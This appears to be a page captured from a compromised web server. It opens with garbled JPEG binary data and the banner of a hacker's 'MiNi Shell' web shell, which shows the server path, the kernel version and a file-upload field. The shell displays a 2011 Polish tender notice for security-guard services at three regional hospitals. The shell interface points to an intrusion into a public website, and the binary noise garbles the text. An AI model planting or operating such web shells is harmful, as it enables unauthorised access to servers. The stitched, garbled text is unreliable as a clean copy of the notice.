JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111004/317040-N-2011.html

<p class="kh_header"><b>Sucha Beskidzka: Usługi ochrony osób, mienia i obiektów Zespołu Opieki Zdrowotnej w Suchej Beskidzkiej tj. Szpitala Rejonowego w Suchej Beskidzkiej , Szpitala w Makowie Podhalańskim oraz Ambulatorium w Jordanowie</b><br>
<b>Numer ogłoszenia: 317040 - 2011; data zamieszczenia: 04.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki  Zdrowotnej , ul. Szpitalna 22, 34-200 Sucha Beskidzka, woj. małopolskie, tel. (033) 872 31 11, faks (033) 872 31 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsuchabeskidzka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi ochrony osób, mienia i obiektów Zespołu Opieki Zdrowotnej w Suchej Beskidzkiej tj. Szpitala Rejonowego w Suchej Beskidzkiej , Szpitala w Makowie Podhalańskim oraz Ambulatorium w Jordanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi ochrony osób, mienia i obiektów Zespołu Opieki Zdrowotnej w Suchej Beskidzkiej tj. Szpitala Rejonowego w Suchej Beskidzkiej, Szpitala w Makowie Podhalańskim  oraz Ambulatorium w  Jordanowie.
  1. Określenie przedmiotu usługi.
-Usługa ochrony osób, mienia i obiektów w Zespole Opieki Zdrowotnej w Suchej Beskidzkiej obejmuje szereg działań mających na celu zapewnienie bezpieczeństwa całego terenu obiektu wraz z budynkami znajdującymi się na jego terenie (dotyczy to szpitala w Suchej Beskidzkiej, Szpitala w Makowie Podhalańskim oraz Ambulatorium w Jordanowie). Działania te polegają na pełnieniu stałych dyżurów na poszczególnych posterunkach oraz realizację obowiązków według wykazu jednostek poniżej.
-Postępowanie obejmuje również dostawę i montaż szlabanu wraz z domofonem i kartami zbliżeniowymi. Opis techniczny szlabanu określa załącznik nr 3 do SIWZ.
-Koszt dostawy i montażu szlabanu winien być skalkulowany w miesięcznych opłatach za ochronę szpitala w Suchej Beskidzkiej. Dostawa i montaż szlabanu nastąpi w terminie do 30 dni od podpisania umowy.
2. Uszczegółowienie przedmiotu usługi dla jednostek w poszczególnych    
    miejscowościach.

SZPITAL W SUCHEJ BESKIDZKIEJ.
-Posterunek A
Czas pracy 24 h na dobę  - 7 dni w tygodniu, 1 pracownik ochrony fizycznej
1)	Otwieranie rampy wjazdowej:
-karetkom pogotowia ratunkowego i transportu sanitarnego
-każdemu pojazdowi, a następnie po dotarciu pojazdu przeprowadzenie wywiadu i udzielenie informacji o dalszym postępowaniu: 
     a) kieruje pacjenta ( ew. osoby towarzyszące) do Segregacji medycznej-Recepcji, 
     b) wskazuje miejsce postoju czasowego 9 do 15 min.), 
     c) kieruje na inne miejsce postojowe z informacją o parkingu płatnym i bezpłatnym,
     odnotowanie tego wjazdu w książce ruchu kołowego,
-lekarzom oraz ratownikom medycznym pełniącym dyżur pod telefonem.
2)	Poinformowanie pracowników Segregacji medycznej-Recepcji (w godzinach 7.00-7.00) o przywiezieniu bądź przybyciu pacjenta.
3)	Wpuszczanie osób odwiedzających pacjentów leczonych w SOR za zgodą pielęgniarki dyżurnej.
4)	Otwieranie drzwi wejściowych do SOR ( obszar zabiegowy, niezabiegowy, obserwacyjny)
 
5)	Otwieranie wjazdu do tzw. rękawa:
-karetkom pogotowia ratunkowego i transportu sanitarnego
-pojazdom z pacjentem wymagającym przełożenia na wózek oraz powiadomienie personelu SOR-u  o przywiezieniu pacjenta.
6)	Kontrola prawidłowego parkowania na terenie obiektu zgodnie z następującymi procedurami: 
-pojazdy po przywiezieniu pacjenta  mogą pozostawać na parkingu przed wejściem 15 minut, a następnie muszą zmienić miejsce parkowania na inny parking,
-karetki i inne pojazdy muszą opuścić rękaw natychmiast po przekazaniu pacjenta służbom medycznym. 
7)	Kontrola ruchu osobowego na terenie obiektu zgodnie z następującymi procedurami: 
-Osoby odwiedzające pacjentów winny być kierowane do wejścia głównego.
Wyjątek od tej reguły stanowią:
-osoby z przepustkami całodobowymi wydanymi przez ordynatorów   
     poszczególnych oddziałów w godzinach od 21.00 do 6.00, 
-osoby towarzyszące pacjentom przyjmowanym do szpitala,
-osoby odwiedzające nowoprzyjętych pacjentów po uzgodnieniu telefonicznym z lekarzem dyżurnym oddziału w godzinach 21.00-6.00.
W sytuacjach wątpliwych należy skontaktować się z koordynatorem Szpitalnego Oddziału Ratunkowego, pielęgniarką koordynującą lub w razie ich nieobecności z pielęgniarką dyżurną SOR.
8)	Monitorowanie obiektu wokół Szpitala:
-reakcja na wszelkie nietypowe zdarzenia i nieprawidłowości
-w razie konieczności odblokowywanie drzwi wejściowych w bloku A                                                               
9)	W godzinach od 21.00 do 6.00:
-obsługa centrali sygnalizacji pożaru CSP POLON 4800 zgodnie z instrukcją postępowania,
-obsługa instalacji oddymiania klatek schodowych bloków: łóżkowego i diagnostycznego  zgodnie z instrukcją postępowania.
10)	Wydawanie kluczy od pomieszczenia do przechowywania zwłok i Pracowni Endoskopii Przewodu Pokarmowego. Odnotowanie tego faktu w książce raportów.
11)	Kontrola ochraniaczy na obuwie zgodnie z obowiązującym standardem:
12)	Zabezpieczenie i wydawanie kluczy od pomieszczeń za wpisem do książki wydania kluczy.
13)	Natychmiastowa pomoc personelowi w przypadku agresywnych pacjentów i osób  odwiedzających, a w razie konieczności wezwanie grupy interwencyjnej.
14)	 Obserwacja kamer z systemu CCTV oraz reagowanie na wszelkie nietypowe zdarzenia i nieprawidłowości.
15)	Kontrola oświetlenia zewnętrznego (zgłaszanie usterek).
Posterunek B
          Czas pracy od poniedziałku do piątku od 6.00 - 15.00 - 2 pracowników
Sobota-niedziela od 6.00 do 15.00- 1 pracownik
Od 15.00-21.00- 7 dni w tygodniu -1 pracownik
         Po zamontowaniu szlabanu 
od 15.00 - 6.00  - 7 dni w tygodniu - 1 pracownik
1)	Kontrola ruchu osobowego w godz. 6.00-15.00
2)	Kierowanie pacjentów do Poradni Specjalistycznych,
3)	Kierowanie osób odwiedzających pacjentów przebywających w oddziałach szpitalnych do wejścia na oddziały,
4)	Kontrola obuwia ochronnego osób odwiedzających szpital zgodnie z obowiązującym standardem
5)	Rzetelne i uprzejme informowanie oraz kierowanie osób wchodzących do bloku A w jaki sposób mogą dostać się w określone miejsca,
6)	Pomoc pacjentom przy korzystaniu z dźwigu zewnętrznego dla osób niepełnosprawnych,	
7)	Otwieranie i zamykanie drzwi zewnętrznych:
-wejściowych (głównych blok C) - godziny otwarcia od 6.00 do 21.00
8)	Otwieranie i zamykanie drzwi wewnętrznych od strony wejścia głównego w bloku C:
-do bloku B- ,Pasaż Handlowy - godziny otwarcia od 6.00 do 21.00
-do Przychodni Specjalistycznej - godziny otwarcia od 6.00 do 20.00
-wejście do szatni - poziom S-1 blok B- godziny otwarcia od 6.00 do 20.00 
9)	Zabezpieczenie i wydawanie kluczy do pomieszczeń za wpisem do książki wydania kluczy.
10)	Obsługa szatni (przyjmowanie i wydawanie odzieży osobom odwiedzającym pacjentów) godziny pracy szatni od 6.00 do 20.00.
11)	 Obsługa centrali sygnalizacji pożaru CSP POLON 4800 zgodnie z instrukcją postępowania.
12)	Obsługa instalacji oddymiania klatek schodowych bloków: łóżkowego, diagnostycznego zgodnie z instrukcją postępowania.
13)	Włączanie i wyłączanie wind osobowych w bloku C - godziny pracy wind od poniedziałku do piątku od 6.00 do 20.00, sobota i niedziela na żądanie.
14)	 Wypożyczanie wózków inwalidzkich.
15)	 Osobiste uczestnictwo pracownika ochrony przy pobieraniu odzieży zdeponowanej w szatni chorych w dni wolne od pracy.
16)	 W razie potrzeby otwieranie szlabanu na posterunku L w godzinach 21.00-6.00.
17)	 Ochrona parkingów zewnętrznych przed Blokiem C i koło kotłowni w godzinach 19.00-7.00
18)	Włączanie i wyłączanie oświetlenia zewnętrznego przed Blokiem C.
Posterunek L (zaplecze - szlaban)
Czas pracy 6.00-6.00  - 7 dni w tygodniu- 1 pracownik ochrony fizycznej
Po zamontowaniu szlabanu:
Czas pracy 6.00-21.00  - 7 dni w tygodniu- 1 pracownik ochrony fizycznej
1)	Obsługa bramy wjazdowej oraz kontrola i ewidencja pojazdów wjeżdżających zgodnie z wykazem zezwoleń.
2)	 Prowadzenie patroli po terenie obiektu zgodnie z przyjętym harmonogramem i wg ustalonej trasy, potwierdzone w systemie kontroli obchodów typu GUARD.
3)	Sprawdzenie zabezpieczenia garaży Transportu Sanitarnego.
4)	Po zakończeniu pracy Transportu Sanitarnego przejęcie kluczy od pomieszczeń garażowych, wydawanie ich w razie potrzeby tylko osobom upoważnionym (odnotowanie wydania -zdania kluczy w książce gospodarki kluczami).
5)	Dbałość o swobodny dojazd do budynku Szpitala.
6)	Egzekwowanie prawa zakazu parkowania w miejscach niedozwolonych.
7)	Ogląd terenu wokół Szpitala za pomocą telewizji przemysłowej CCTV oraz reagowanie na wszelkie nietypowe zdarzenia i nieprawidłowości. 
8)	Otwieranie i zamykanie drzwi zewnętrznych:
-zaplecza gospodarczego (poziom S2) - godziny otwarcia od 6.00 do 19.30 (lub wg. potrzeb zaopatrzenia)
-przejścia służbowego (parter - od strony parku) - godziny otwarcia od 6.00 do 20.00
9)	 Sprawdzenie zabezpieczenia drzwi zewnętrznych.
10)	 Reagowanie na wszelkie zdarzenia na obiekcie.
11)	 Natychmiastowa pomoc personelowi w przypadku agresywnych pacjentów i osób odwiedzających.
12)	 Nadzorowanie i obsługa systemu zewnętrznego monitoringu telewizyjnego terenu Szpitala Rejonowego w Suchej Beskidzkiej.

Przyjęcie informacji o lądowaniu śmigłowca sanitarnego i zabezpieczenie terenu. Obowiązek ten będzie wykonywany przez pracownika z Posterunku B lub L.

Zamawiający zastrzega sobie prawo do zmiany godzin pracy jak również obowiązków pomiędzy posterunkami B i L.
     
SZPITAL W MAKOWIE PODHALAŃSKIM.
		Czas pracy 24 h - dobę - 7 dni w tygodniu

-Ochrona całego terenu szpitala wraz z parkingiem  
-Pełnienie dyżurów w posterunkach (portiernia) i wypełnianie obowiązków określonych poniżej:

1)	Zabezpieczenie i wydawanie kluczy (za wpisem do książki gospodarki kluczami) do pomieszczeń.
2)	Obsługa bramy wjazdowej wraz z kontrolą pojazdów wjeżdżających
3)	Każdorazowe zamykanie bramy wjazdowej
4)	Prowadzenie obchodów po całym terenie obiektu wg harmonogramu i po określonej trasie oraz odnotowywanie ich w systemie kontroli obchodów GUARD.
5)	Monitorowanie całego terenu wokół Szpitala
6)	Dbałość o swobodny dojazd do budynku Szpitala.
7)	Zwracanie uwagi o zakazie parkowania w miejscach niedozwolonych.
8)	Obsługa centrali telefonicznej, ewidencjonowanie zamiejscowych rozmów telefonicznych stacjonarnych i komórkowych.
9)	Udzielanie informacji osobom odwiedzającym o lokalizacji poszczególnych oddziałów.
10)	 Natychmiastowa pomoc personelowi w przypadku agresywnych pacjentów i osób odwiedzających, w razie potrzeby wezwanie grupy interwencyjnej.
11)	 Sprawdzenie zabezpieczenia drzwi zewnętrznych.
12)	 Reakcja na wszelkie nieprawidłowości na terenie obiektu.

AMBULATORIUM OPIEKI CAŁODOBOWEJ I MIEJSCE STACJONOWANIA ZRM W JORDANOWIE

Całodobowa ochrona poprzez
1) Utrzymanie w gotowości grupy interwencyjnej,
2) Patrole prewencyjne w razie potrzeby na wezwanie oraz kontrolne zwłaszcza po wyjeździe Zespołu Ratownictwa Medycznego gdy obiekt pozostaje pusty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
2. Koncesja wydana przez Ministra SWiA na działalność gospodarczą w zakresie usług ochrony osób i mienia na podstawie ustawy z 22.08.1997r. o ochronie osób i mienia                    (Dz.U. z 2005r. nr 145, poz. 1221 z póź. zm)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania wiedzy i doświadczenia,
2. W celu wykazania spełnienia warunku dotyczącego posiadania wiedzy i doświadczenia, Zamawiający wymaga, aby wykonawca wykonał, co najmniej dwie usługi w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem i wartościom usługom stanowiącym przedmiot zamówienia tj. ochrona zamkniętych obszarów zakładów opieki zdrowotnej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) sytuacji ekonomicznej i finansowej
2. W celu wykazania spełnienia warunku dotyczącego sytuacji ekonomicznej i finansowej spełnieniem będzie opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę min. 1.000.000,00 zł w zakresie prowadzonej działalności związanej przedmiotem zmówienia, z klauzulą ubezpieczenia od ryzyka przenoszenia chorób zakaźnych, ważna na okres trwania umowy. W przypadku polisy zawartej na krótszy okres zamawiający wymaga dostarczenia nowej polisy do zamawiającego na co najmniej 5 dni przed upływem terminu obowiązywania poprzedniej polisy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsuchabeskidzka.pl<br>
